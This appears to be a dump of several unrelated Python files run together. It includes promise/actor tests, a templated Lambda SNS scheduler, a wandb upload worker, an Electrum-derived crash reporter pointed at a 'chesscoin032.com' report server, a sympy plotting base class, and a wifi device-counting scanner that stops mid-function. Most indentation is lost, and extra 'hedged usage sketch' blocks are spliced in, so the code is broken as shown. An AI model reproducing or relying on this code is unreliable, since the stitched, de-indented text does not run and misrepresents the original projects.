.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('catch', 3)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v, False)) \
.then(lambda v: gen_promise(v), lambda v: gen_promise(v + 1, False)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('gen_promise', 4), ('thread_body', 5),
('catch', 5)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v, False)) \
.then(lambda v: gen_promise(v), lambda v: _raise_exception(ValueError)) \
.catch(lambda *_: value_list.append(('catch',))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('catch', )]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v, False)) \
.catch(lambda v: gen_promise(v, False)) \
.catch(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('gen_promise', 3), ('thread_body', 4),
('gen_promise', 4), ('thread_body', 5)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v, False)) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('catch', 2)]
)
finally:
self.assertDictEqual(promise._promise_pool, {})
req_queue.put((None, None, None))
def testPromiseActor(self):
try:
with create_actor_pool(n_process=1) as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
test_ref.test_normal()
wait_test_actor_result(test_ref, 10)
self.assertListEqual(serve_ref.get_result(), list(range(11)))
serve_ref.clear_result()
test_ref.reset_finished()
test_ref.test_error_raise()
wait_test_actor_result(test_ref, 10)
self.assertListEqual(serve_ref.get_result(), [-1])
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
def testAll(self):
promises = weakref.WeakValueDictionary()
req_queue = Queue()
value_list = []
time_unit = 0.1
def test_thread_body():
while True:
idx, v, success = req_queue.get()
if v is None:
break
value_list.append(('thread_body', v))
time.sleep(time_unit)
promises[idx].step_next([(v,), dict(_accept=success)])
def gen_promise(value, accept=True):
p = promise.Promise()
promises[p.id] = p
req_queue.put((p.id, value + 1, accept))
return p
try:
thread = threading.Thread(target=test_thread_body)
thread.daemon = True
thread.start()
value_list = []
promise.all_([]).then(lambda: value_list.append(('all', 0))).wait()
self.assertListEqual(value_list, [('all', 0)])
value_list = []
prior_promises = [gen_promise(idx) for idx in range(4)]
promise.all_(prior_promises).then(lambda: value_list.append(('all', 5))).wait()
del prior_promises
self.assertListEqual(
value_list,
[('thread_body', 1), ('thread_body', 2), ('thread_body', 3),
('thread_body', 4), ('all', 5)]
)
value_list = []
prior_promises = [gen_promise(idx, bool((idx + 1) % 2)) for idx in range(4)]
promise.all_(prior_promises).then(
lambda: value_list.append(('all', 5)),
lambda *_: value_list.append(('all_catch', 5)),
).wait()
del prior_promises
expected = [('thread_body', 1), ('thread_body', 2), ('all_catch', 5)]
self.assertListEqual(value_list[:len(expected)], expected)
time.sleep(0.5)
def _gen_all_promise(*_):
prior_promises = [gen_promise(idx, bool((idx + 1) % 2)) for idx in range(4)]
return promise.all_(prior_promises)
value_list = []
gen_promise(0) \
.then(lambda *_: value_list.append(('pre_all', 0))) \
.then(_gen_all_promise) \
.then(lambda v: gen_promise(v)) \
.then(
lambda: value_list.append(('all', 5)),
lambda *_: value_list.append(('all_catch', 5)),
).wait()
expected = [('thread_body', 1), ('pre_all', 0), ('thread_body', 1), ('thread_body', 2), ('all_catch', 5)]
self.assertListEqual(value_list[:len(expected)], expected)
time.sleep(0.5)
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
req_queue.put((None, None, None))
def testSpawnPromisedActor(self):
try:
with create_actor_pool(n_process=1) as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
start_time = time.time()
test_ref.test_spawn()
self.assertLess(time.time() - start_time, 0.5)
wait_test_actor_result(test_ref, 30)
self.assertEqual(serve_ref.get_result(), [0])
self.assertGreaterEqual(time.time() - start_time, 0.5)
self.assertLess(time.time() - start_time, 1)
serve_ref.clear_result()
test_ref.reset_finished()
start_time = time.time()
test_ref.test_spawn(raises=True)
self.assertLess(time.time() - start_time, 0.5)
wait_test_actor_result(test_ref, 30)
self.assertEqual(serve_ref.get_result(), ['SystemError'])
self.assertGreaterEqual(time.time() - start_time, 0.5)
self.assertLess(time.time() - start_time, 1)
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
def testAllActor(self):
try:
with create_actor_pool(n_process=1) as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
test_ref.test_all_promise()
wait_test_actor_result(test_ref, 30)
self.assertListEqual(
serve_ref.get_result(),
[-128] + list(range(0, 20, 2)) + list(range(1, 20, 2)) + [127]
)
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
def testTimeoutActor(self):
try:
with create_actor_pool(n_process=1) as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
test_ref.test_timeout()
wait_test_actor_result(test_ref, 30)
self.assertListEqual(serve_ref.get_result(), [0, 'PromiseTimeout'])
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
def testNoTimeoutActor(self):
try:
with create_actor_pool(n_process=1) as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
test_ref.test_no_timeout()
wait_test_actor_result(test_ref, 30)
self.assertListEqual(serve_ref.get_result(), [0])
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
def testRefReject(self):
try:
with create_actor_pool(n_process=1) as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
test_ref.test_ref_reject()
wait_test_actor_result(test_ref, 30)
self.assertListEqual(serve_ref.get_result(), ['WorkerProcessStopped', 0])
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
def testAddrReject(self):
try:
with create_actor_pool(n_process=1) as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
test_ref.test_addr_reject()
wait_test_actor_result(test_ref, 30)
self.assertListEqual(serve_ref.get_result(), ['WorkerDead', 0])
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
def testClosureRefcount(self):
try:
with create_actor_pool(n_process=1) as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
test_ref.test_closure_refcount()
wait_test_actor_result(test_ref, 30)
self.assertIsNone(serve_ref.get_result()[-1]())
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
|
app.py
|
# -*- coding: utf-8 -*-
"""Lambda application to process sending sub-minute events to SNS."""
import re
import time
import json
import threading
import boto3
sns = boto3.client('sns')
def set_interval(rate):
    seconds = int(re.search(r'rate\((\d+) seconds*\)', rate).group(1))
def decorator(function):
def wrapper(*args, **kwargs):
stopped = threading.Event()
def loop(): # executed in another thread
while not stopped.wait(seconds): # until stopped
function(*args, **kwargs)
thread = threading.Thread(target=loop)
thread.daemon = True # stop if the program exits
thread.start()
return stopped
return wrapper
return decorator
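# ---------------------------------------------------------------------------
# Hedged usage sketch, not part of the generated Lambda code: set_interval()
# above parses a CloudWatch-style rate expression and re-runs the decorated
# function on that interval in a daemon thread. Calling the decorated function
# starts the loop and returns the threading.Event used to stop it. The
# _heartbeat name below is an assumption for illustration only.
@set_interval("rate(10 seconds)")
def _heartbeat():
    print("tick")
# stop_event = _heartbeat()   # starts the background loop
# stop_event.set()            # stops it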
def send_message(interval, rate):
return sns.publish(
TopicArn='{{topic_arn}}',
Message=json.dumps({
"default": f"{interval}: {rate}",
}),
MessageStructure='json',
MessageAttributes={
'cron_interval': {
'DataType': 'String',
'StringValue': interval,
},
'cron_rate': {
'DataType': 'String',
'StringValue': rate,
},
},
)
{% for interval, rate in second_intervals.items() %}
@set_interval("{{rate}}")
def {{interval}}(*args, **kwargs):
send_message("""{{interval}}""", """{{rate}}""")
{% endfor %}
def handler(event, context):
time.sleep(59)
|
step_checksum.py
|
"""Batching file prepare requests to our API."""
import collections
import os
import shutil
import threading
import wandb.util
from wandb.filesync import step_upload
RequestUpload = collections.namedtuple(
"RequestUpload",
(
"path",
"save_name",
"artifact_id",
"copy",
"use_prepare_flow",
"save_fn",
"digest",
),
)
RequestStoreManifestFiles = collections.namedtuple(
"RequestStoreManifestFiles", ("manifest", "artifact_id", "save_fn")
)
RequestCommitArtifact = collections.namedtuple(
"RequestCommitArtifact", ("artifact_id", "finalize", "before_commit", "on_commit")
)
RequestFinish = collections.namedtuple("RequestFinish", ())
class StepChecksum(object):
def __init__(self, api, tempdir, request_queue, output_queue, stats):
self._api = api
self._tempdir = tempdir
self._request_queue = request_queue
self._output_queue = output_queue
self._stats = stats
self._thread = threading.Thread(target=self._thread_body)
self._thread.daemon = True
def _thread_body(self):
finished = False
while True:
req = self._request_queue.get()
if isinstance(req, RequestUpload):
path = req.path
if req.copy:
path = os.path.join(
self._tempdir.name,
"%s-%s" % (wandb.util.generate_id(), req.save_name),
)
wandb.util.mkdir_exists_ok(os.path.dirname(path))
try:
# certain linux distros throw an exception when copying
# large files: https://bugs.python.org/issue43743
shutil.copy2(req.path, path)
except OSError:
shutil._USE_CP_SENDFILE = False
shutil.copy2(req.path, path)
checksum = None
if req.use_prepare_flow:
# passing a checksum through indicates that we'd like to use the
# "prepare" file upload flow, in which we prepare the files in
# the database before uploading them. This is currently only
# used for artifact manifests
checksum = wandb.util.md5_file(path)
self._stats.init_file(req.save_name, os.path.getsize(path))
self._output_queue.put(
step_upload.RequestUpload(
path,
req.save_name,
req.artifact_id,
checksum,
req.copy,
req.save_fn,
req.digest,
)
)
elif isinstance(req, RequestStoreManifestFiles):
for entry in req.manifest.entries.values():
if entry.local_path:
# This stupid thing is needed so the closure works correctly.
def make_save_fn_with_entry(save_fn, entry):
return lambda progress_callback: save_fn(
entry, progress_callback
)
self._stats.init_file(
entry.local_path, entry.size, is_artifact_file=True
)
self._output_queue.put(
step_upload.RequestUpload(
entry.local_path,
entry.path,
req.artifact_id,
entry.digest,
False,
make_save_fn_with_entry(req.save_fn, entry),
entry.digest,
)
)
elif isinstance(req, RequestCommitArtifact):
self._output_queue.put(
step_upload.RequestCommitArtifact(
req.artifact_id, req.finalize, req.before_commit, req.on_commit
)
)
elif isinstance(req, RequestFinish):
break
else:
raise Exception("internal error")
self._output_queue.put(step_upload.RequestFinish())
def start(self):
self._thread.start()
def is_alive(self):
return self._thread.is_alive()
def finish(self):
self._request_queue.put(RequestFinish())
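# ---------------------------------------------------------------------------
# Hedged illustration, not part of the original module: why _thread_body()
# builds each save_fn through make_save_fn_with_entry above. Lambdas created
# inside a loop close over the loop *variable*, not its current value, so
# without the factory every callback would see the last manifest entry. A
# minimal, self-contained demonstration of the pitfall and the fix:
def _closure_binding_demo():
    late = [lambda: i for i in range(3)]            # all close over the same i
    bound = [(lambda i=i: i) for i in range(3)]     # default arg freezes each value
    assert [f() for f in late] == [2, 2, 2]
    assert [f() for f in bound] == [0, 1, 2]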
|
base_crash_reporter.py
|
# Electrum - lightweight Bitcoin client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import sys
import queue
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger, get_git_version
class BaseCrashReporter(Logger):
report_server = "https://chesscoin032.com/"
config_key = "show_crash_reporter"
issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
CRASH_TITLE = _('Sorry!')
REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
'useful debug information:')
DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
ASK_CONFIRM_SEND = _("Do you want to send this report?")
USER_COMMENT_PLACEHOLDER = _("Do not enter sensitive/private information here. "
"The report will be visible on the public issue tracker.")
def __init__(self, exctype, value, tb):
Logger.__init__(self)
self.exc_args = (exctype, value, tb)
def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
if constants.net.GENESIS[-4:] not in ["4943", "e26f"] and ".electrum.org" in BaseCrashReporter.report_server:
# Gah! Some kind of altcoin wants to send us crash reports.
raise Exception(_("Missing report URL."))
report = self.get_traceback_info()
report.update(self.get_additional_info())
report = json.dumps(report)
coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
return response
async def do_post(self, proxy, url, data):
async with make_aiohttp_session(proxy) as session:
async with session.post(url, data=data, raise_for_status=True) as resp:
return await resp.text()
def get_traceback_info(self):
exc_string = str(self.exc_args[1])
stack = traceback.extract_tb(self.exc_args[2])
readable_trace = self.__get_traceback_str_to_send()
id = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": self.exc_args[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": id
}
def get_additional_info(self):
args = {
"app_version": get_git_version() or ELECTRUM_VERSION,
"python_version": sys.version,
"os": describe_os_version(),
"wallet_type": "unknown",
"locale": locale.getdefaultlocale()[0] or "?",
"description": self.get_user_description()
}
try:
args["wallet_type"] = self.get_wallet_type()
except:
# Maybe the wallet isn't loaded yet
pass
return args
def __get_traceback_str_to_send(self) -> str:
# make sure that traceback sent to crash reporter contains
# e.__context__ and e.__cause__, i.e. if there was a chain of
# exceptions, we want the full traceback for the whole chain.
return "".join(traceback.format_exception(*self.exc_args))
def _get_traceback_str_to_display(self) -> str:
# overridden in Qt subclass
return self.__get_traceback_str_to_send()
def get_report_string(self):
info = self.get_additional_info()
info["traceback"] = self._get_traceback_str_to_display()
return self.issue_template.format(**info)
def get_user_description(self):
raise NotImplementedError
def get_wallet_type(self) -> str:
raise NotImplementedError
class EarlyExceptionsQueue:
"""Helper singleton for explicitly sending exceptions to crash reporter.
Typically the GUIs set up an "exception hook" that catches all otherwise
uncaught exceptions (which unroll the stack of a thread completely).
This class provides methods to report *any* exception, and queueing logic
that delays processing until the exception hook is set up.
"""
_is_exc_hook_ready = False
_exc_queue = queue.Queue()
@classmethod
def set_hook_as_ready(cls):
if cls._is_exc_hook_ready:
return
cls._is_exc_hook_ready = True
while cls._exc_queue.qsize() > 0:
e = cls._exc_queue.get()
cls._send_exception_to_crash_reporter(e)
@classmethod
def send_exception_to_crash_reporter(cls, e: BaseException):
if cls._is_exc_hook_ready:
cls._send_exception_to_crash_reporter(e)
else:
cls._exc_queue.put(e)
@staticmethod
def _send_exception_to_crash_reporter(e: BaseException):
assert EarlyExceptionsQueue._is_exc_hook_ready
sys.excepthook(type(e), e, e.__traceback__)
send_exception_to_crash_reporter = EarlyExceptionsQueue.send_exception_to_crash_reporter
def trigger_crash():
# note: do not change the type of the exception, the message,
# or the name of this method. All reports generated through this
# method will be grouped together by the crash reporter, and thus
# don't spam the issue tracker.
class TestingException(Exception):
pass
def crash_test():
raise TestingException("triggered crash for testing purposes")
import threading
t = threading.Thread(target=crash_test)
t.start()
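# ---------------------------------------------------------------------------
# Hedged usage sketch, not part of the original module: how a GUI is expected
# to drive EarlyExceptionsQueue. Exceptions reported before the hook exists are
# queued; set_hook_as_ready() replays them through sys.excepthook once the GUI
# has installed its handler. The _install_gui_exception_hook name and the
# handler body are assumptions for illustration only.
def _install_gui_exception_hook():
    def gui_excepthook(exc_type, exc_value, exc_tb):
        # a real GUI would open its crash-report dialog here
        print("unhandled:", exc_type.__name__, exc_value)
    sys.excepthook = gui_excepthook
    EarlyExceptionsQueue.set_hook_as_ready()   # flush anything queued earlier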
|
plot_mode_base.py
|
from pyglet.gl import *
from plot_mode import PlotMode
from threading import Thread, Event, RLock
from color_scheme import ColorScheme
from sympy.core.basic import S
from time import sleep
class PlotModeBase(PlotMode):
"""
Intended parent class for plotting
modes. Provides base functionality
in conjunction with its parent,
PlotMode.
"""
##
## Class-Level Attributes
##
"""
The following attributes are meant
to be set at the class level, and serve
as parameters to the plot mode registry
(in PlotMode). See plot_modes.py for
concrete examples.
"""
"""
i_vars
'x' for Cartesian2D
'xy' for Cartesian3D
etc.
d_vars
'y' for Cartesian2D
'r' for Polar
etc.
"""
i_vars, d_vars = '', ''
"""
intervals
Default intervals for each i_var, and in the
same order. Specified [min, max, steps].
No variable can be given (it is bound later).
"""
intervals = []
"""
aliases
A list of strings which can be used to
access this mode.
'cartesian' for Cartesian2D and Cartesian3D
'polar' for Polar
'cylindrical', 'polar' for Cylindrical
Note that _init_mode chooses the first alias
in the list as the mode's primary_alias, which
will be displayed to the end user in certain
contexts.
"""
aliases = []
"""
is_default
Whether to set this mode as the default
for arguments passed to PlotMode() containing
the same number of d_vars as this mode and
at most the same number of i_vars.
"""
is_default = False
"""
All of the above attributes are defined in PlotMode.
The following ones are specific to PlotModeBase.
"""
"""
A list of the render styles. Do not modify.
"""
styles = {'wireframe':1, 'solid':2, 'both':3}
"""
style_override
Always use this style if not blank.
"""
style_override = ''
"""
default_wireframe_color
default_solid_color
Can be used when color is None or being calculated.
Used by PlotCurve and PlotSurface, but not anywhere
in PlotModeBase.
"""
default_wireframe_color = (0.85,0.85,0.85)
default_solid_color = (0.6,0.6,0.9)
default_rot_preset = 'xy'
##
## Instance-Level Attributes
##
## 'Abstract' member functions
def _get_evaluator(self):
if self.use_lambda_eval:
try:
e = self._get_lambda_evaluator()
return e
except:
print ("\nWarning: creating lambda evaluator failed. "
"Falling back on sympy subs evaluator.")
return self._get_sympy_evaluator()
def _get_sympy_evaluator(self):
raise NotImplementedError()
def _get_lambda_evaluator(self):
raise NotImplementedError()
def _on_calculate_verts(self):
raise NotImplementedError()
def _on_calculate_cverts(self):
raise NotImplementedError()
## Base member functions
def __init__(self, *args, **kwargs):
self.verts = []
self.cverts = []
self.bounds = [ [S.Infinity,-S.Infinity,0],[S.Infinity,-S.Infinity,0],[S.Infinity,-S.Infinity,0] ]
self.cbounds = [ [S.Infinity,-S.Infinity,0],[S.Infinity,-S.Infinity,0],[S.Infinity,-S.Infinity,0] ]
self._draw_lock = RLock()
self._calculating_verts = Event()
self._calculating_cverts = Event()
self._calculating_verts_pos = 0.0
self._calculating_verts_len = 0.0
self._calculating_cverts_pos = 0.0
self._calculating_cverts_len = 0.0
self._max_render_stack_size = 3
self._draw_wireframe = [-1]
self._draw_solid = [-1]
self._style = None
self._color = None
self.predraw = []
self.postdraw = []
self.use_lambda_eval = self.options.pop('use_sympy_eval', None) is None
self.style = self.options.pop('style', '')
self.color = self.options.pop('color', 'rainbow')
self.bounds_callback = kwargs.pop('bounds_callback', None)
self._on_calculate()
def synchronized(f):
def w(self, *args, **kwargs):
self._draw_lock.acquire()
try:
r = f(self, *args, **kwargs)
return r
finally:
self._draw_lock.release()
return w
@synchronized
def push_wireframe(self, function):
"""
Push a function which performs gl commands
used to build a display list. (The list is
built outside of the function)
"""
assert callable(function)
self._draw_wireframe.append(function)
if len(self._draw_wireframe) > self._max_render_stack_size:
del self._draw_wireframe[1] # leave marker element
@synchronized
def push_solid(self, function):
"""
Push a function which performs gl commands
used to build a display list. (The list is
built outside of the function)
"""
assert callable(function)
self._draw_solid.append(function)
if len(self._draw_solid) > self._max_render_stack_size:
del self._draw_solid[1] # leave marker element
def _create_display_list(self, function):
dl = glGenLists(1)
glNewList(dl, GL_COMPILE)
function()
glEndList()
return dl
def _render_stack_top(self, render_stack):
top = render_stack[-1]
if top == -1:
return -1 # nothing to display
elif callable(top):
dl = self._create_display_list(top)
render_stack[-1] = (dl, top)
return dl # display newly added list
elif len(top) == 2:
if GL_TRUE == glIsList(top[0]):
return top[0] # display stored list
dl = self._create_display_list(top[1])
render_stack[-1] = (dl, top[1])
return dl # display regenerated list
def _draw_solid_display_list(self, dl):
glPushAttrib(GL_ENABLE_BIT | GL_POLYGON_BIT)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
glCallList(dl)
glPopAttrib()
def _draw_wireframe_display_list(self, dl):
glPushAttrib(GL_ENABLE_BIT | GL_POLYGON_BIT)
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
glEnable(GL_POLYGON_OFFSET_LINE)
glPolygonOffset(-0.005, -50.0)
glCallList(dl)
glPopAttrib()
@synchronized
def draw(self):
for f in self.predraw:
if callable(f): f()
if self.style_override:
style = self.styles[self.style_override]
else:
style = self.styles[self._style]
# Draw solid component if style includes solid
if style & 2:
dl = self._render_stack_top(self._draw_solid)
if dl > 0 and GL_TRUE == glIsList(dl):
self._draw_solid_display_list(dl)
# Draw wireframe component if style includes wireframe
if style & 1:
dl = self._render_stack_top(self._draw_wireframe)
if dl > 0 and GL_TRUE == glIsList(dl):
self._draw_wireframe_display_list(dl)
for f in self.postdraw:
if callable(f): f()
def _on_change_color(self, color):
Thread(target=self._calculate_cverts).start()
def _on_calculate(self):
Thread(target=self._calculate_all).start()
def _calculate_all(self):
self._calculate_verts()
self._calculate_cverts()
def _calculate_verts(self):
if self._calculating_verts.isSet(): return
self._calculating_verts.set()
try: self._on_calculate_verts()
finally: self._calculating_verts.clear()
if callable(self.bounds_callback):
self.bounds_callback()
def _calculate_cverts(self):
if self._calculating_verts.isSet(): return
while self._calculating_cverts.isSet():
sleep(0) # wait for previous calculation
self._calculating_cverts.set()
try: self._on_calculate_cverts()
finally: self._calculating_cverts.clear()
def _get_calculating_verts(self):
return self._calculating_verts.isSet()
def _get_calculating_verts_pos(self):
return self._calculating_verts_pos
def _get_calculating_verts_len(self):
return self._calculating_verts_len
def _get_calculating_cverts(self):
return self._calculating_cverts.isSet()
def _get_calculating_cverts_pos(self):
return self._calculating_cverts_pos
def _get_calculating_cverts_len(self):
return self._calculating_cverts_len
## Property handlers
def _get_style(self):
return self._style
@synchronized
def _set_style(self, v):
if v is None: return
        if v == '':
step_max = 0
for i in self.intervals:
if i.v_steps is None: continue
step_max = max([step_max, i.v_steps])
v = ['both', 'solid'][step_max > 40]
#try:
assert v in self.styles
if v == self._style: return
self._style = v
#except Exception, e:
#raise Exception(("Style change failed. "
#"Reason: %s is not a valid "
#"style. Use one of %s.") %
#(str(v), ', '.join(self.styles.iterkeys())))
def _get_color(self):
return self._color
@synchronized
def _set_color(self, v):
try:
if v is not None:
if isinstance(v, (list, tuple)):
v = ColorScheme(*v)
else: v = ColorScheme(v)
if repr(v) == repr(self._color): return
self._on_change_color(v)
self._color = v
        except Exception as e:
raise Exception(("Color change failed. "
"Reason: %s" % (str(e))))
style = property(_get_style, _set_style)
color = property(_get_color, _set_color)
calculating_verts = property(_get_calculating_verts)
calculating_verts_pos = property(_get_calculating_verts_pos)
calculating_verts_len = property(_get_calculating_verts_len)
calculating_cverts = property(_get_calculating_cverts)
calculating_cverts_pos = property(_get_calculating_cverts_pos)
calculating_cverts_len = property(_get_calculating_cverts_len)
## String representations
def __str__(self):
f = ", ".join(str(d) for d in self.d_vars)
o = "'mode=%s'" % (self.primary_alias)
return ", ".join([f, o])
def __repr__(self):
f = ", ".join(str(d) for d in self.d_vars)
i = ", ".join(str(i) for i in self.intervals)
d = [ ( 'mode', self.primary_alias ),
( 'color', str(self.color) ),
( 'style', str(self.style) ) ]
o = "'%s'" % (("; ".join("%s=%s" % (k,v)
for k,v in d if v != 'None')))
return ", ".join([f, i, o])
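# ---------------------------------------------------------------------------
# Hedged standalone sketch, not part of the original module: the `synchronized`
# decorator used above holds the instance's RLock for the duration of a method
# call, so nested synchronized calls on the same thread do not deadlock. A
# minimal, self-contained version of the same pattern (names are illustrative):
def _synchronized_demo():
    from threading import RLock

    def synchronized_method(f):
        def wrapper(self, *args, **kwargs):
            with self._lock:                 # re-entrant: nested calls are fine
                return f(self, *args, **kwargs)
        return wrapper

    class Counter(object):
        def __init__(self):
            self._lock = RLock()
            self.value = 0

        @synchronized_method
        def bump(self):
            self.value += 1
            return self.value

    c = Counter()
    assert c.bump() == 1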
|
__main__.py
|
import threading
import sys
import os
import os.path
import platform
import subprocess
import json
import time
import requests
import logging
import netifaces
import click
from wifi_scanner.oui import load_dictionary, download_oui
from wifi_scanner.analysis import analyze_file
from wifi_scanner.colors import *
def getserial():
# Extract serial from cpuinfo file
cpuserial = "0000000000000000"
try:
f = open('/proc/cpuinfo','r')
for line in f:
if line[0:6]=='Serial':
cpuserial = line[10:26]
f.close()
except:
cpuserial = "ERROR000000000"
return cpuserial
SERIAL = getserial()
SEND_BUFFER = []
IOT_URL = 'http://games.protospace.ca:5000/wifi-scan'
if os.name != 'nt':
from pick import pick
import curses
def which(program):
"""Determines whether program exists
"""
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
    raise FileNotFoundError('%s not found on PATH' % program)
def showTimer(timeleft):
"""Shows a countdown timer"""
total = int(timeleft) * 10
for i in range(total):
sys.stdout.write('\r')
# the exact output you're looking for:
timeleft_string = '%ds left' % int((total - i + 1) / 10)
if (total - i + 1) > 600:
timeleft_string = '%dmin %ds left' % (
int((total - i + 1) / 600), int((total - i + 1) / 10 % 60))
sys.stdout.write("[%-50s] %d%% %15s" %
('=' * int(50.5 * i / total), 101 * i / total, timeleft_string))
sys.stdout.flush()
time.sleep(0.1)
print("")
def fileToMacSet(path):
with open(path, 'r') as f:
maclist = f.readlines()
return set([x.strip() for x in maclist])
def scan(adapter, scantime, verbose, dictionary, number, nearby, jsonprint, out, allmacaddresses, manufacturers, nocorrection, sort, targetmacs, pcap):
"""Monitor wifi signals to count the number of people around you"""
# print("OS: " + os.name)
# print("Platform: " + platform.system())
if (not os.path.isfile(dictionary)) or (not os.access(dictionary, os.R_OK)):
download_oui(dictionary)
oui = load_dictionary(dictionary)
if not oui:
print('couldn\'t load [%s]' % dictionary)
sys.exit(1)
try:
tshark = which("tshark")
except:
if platform.system() != 'Darwin':
print('tshark not found, install using\n\napt-get install tshark\n')
else:
print('wireshark not found, install using: \n\tbrew install wireshark')
print(
'you may also need to execute: \n\tbrew cask install wireshark-chmodbpf')
sys.exit(1)
if jsonprint:
number = True
if number:
verbose = False
if not pcap:
if len(adapter) == 0:
if os.name == 'nt':
print('You must specify the adapter with -a ADAPTER')
print('Choose from the following: ' +
', '.join(netifaces.interfaces()))
sys.exit(1)
title = 'Please choose the adapter you want to use: '
try:
adapter, index = pick(netifaces.interfaces(), title)
except curses.error as e:
print('Please check your $TERM settings: %s' % (e))
sys.exit(1)
print("Using %s adapter and scanning for %s seconds..." %
(adapter, scantime))
if not number:
# Start timer
t1 = threading.Thread(target=showTimer, args=(scantime,))
t1.daemon = True
t1.start()
dump_file = '/tmp/tshark-temp'
# Scan with tshark
command = [tshark, '-I', '-i', adapter, '-a',
'duration:' + scantime, '-w', dump_file]
if verbose:
print(' '.join(command))
run_tshark = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, nothing = run_tshark.communicate()
if not number:
t1.join()
else:
dump_file = pcap
# Read tshark output
command = [
tshark, '-r',
dump_file, '-T',
'fields', '-e',
'wlan.sa', '-e',
'wlan.bssid', '-e',
'radiotap.dbm_antsignal'
]
if verbose:
print(' '.join(command))
run_tshark = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output, nothing = run_tshark.communicate()
# read target MAC address
targetmacset = set()
if targetmacs != '':
targetmacset = fileToMacSet(targetmacs)
foundMacs = {}
for line in output.decode('utf-8').split('\n'):
if verbose:
